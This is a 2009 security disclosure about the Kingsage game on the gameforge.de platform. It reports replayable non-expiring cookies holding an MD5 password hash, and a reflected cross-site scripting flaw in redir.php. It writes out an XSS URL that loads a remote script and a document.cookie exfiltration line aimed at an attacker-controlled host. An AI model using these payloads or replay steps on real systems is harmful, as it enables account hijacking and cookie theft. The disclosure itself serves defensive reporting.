gameforge-xsscookie.txt
Posted on 30 September 2009
Dear all, I'd like to inform you about a security vulnerability in gameforge.de gaming platform. This vulnerability is validated only for kingsage.gr (versions 0.1.17, 0.1.18 and 0.1.19 - latest) but might affect all games developed under the specific gaming platform (e.g.: ikariam, gladiatus, katsuro, battleknight, bitefight, etc.) =========================== Authentication bypass using hashed values ==================== After the initial login into the game all following plain HTTP GET/POST requests are similar to this: GET http://s1.kingsage.gr/game.php?village=24482&s=build_main HTTP/1.1 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/x-silverlight, */* Referer: http://s1.kingsage.gr/game.php?village=24482&s=build_main&p=2141&build=iron Accept-Language: el Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729; FDM; .NET CLR 1.1.4322) Host: s1.kingsage.gr Cookie: game_hash=cce006dc722ff22ad8a8e5a13fd3c698; SD_FRAMEWORK_SESSION=0b1f74bebf7875e96338e9d4c6e37d4e; game_user=some.user; game_pass=347183427615221ca90w24db1039a8cc Proxy-Connection: Keep-Alive which, among others, include three critical elements: village=24482 [The village number - can be found for any user from within the game] game_user=some.user [The users' username in plaintext] game_pass=347183427615221ca90w24db1039a8cc [The md5 hash value of the users' password] Taking into account that this traffic, which is plain HTTP can be sniffed and that the games' cookies do not expire, a malicious user - by obtaining another users' cookies *once* - can bypass authentication and access the application/game as another user *at any time*. The steps are the following. 1. The malicious user uses his/her personal account to enter the game 2. The malicious user modifies any following request by deleting SD_FRAMEWORK_SESSION and game_hash from the cookie and POSTS only the village, game_user and game_pass values that he/she has obtained. Using this approach a malicious user can access (at any time) the account of another user without knowing his/her (plaintext) password. =========================== Vulnerability Impact (Correlated with Cross Site Scripting) ============= The existence of Cross Site Scripting at the gaming platform raises the impact of the vulnerability: As an example if malicious user [A] sends to user [B] a message like this: [url] http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E[/url]<http://s1.kingsage.gr/redir.php?url=%3CSCRIPT%20SRC=http://www.stormloader.com/users/hakin/kingsagegr.js%3E%3C/SCRIPT%3E%5B/url%5D> *From withing the games' messaging functionality* User [A] is able to inject/include malicious javascript code [<SCRIPT SRC=http://../maliciouscode.js></SCRIPT>] in order to steal the cookie - which includes all sensitive information for the attack described in the first part - of user [B] (This can be accomplished using e.g.: document.location=' http://user_a_controlled_site?cookie='+document.cookie<http://user_a_controlled_site/?cookie=%27+document.cookie>; in the maliciouscode.js) Kind regards, mestre.rigel

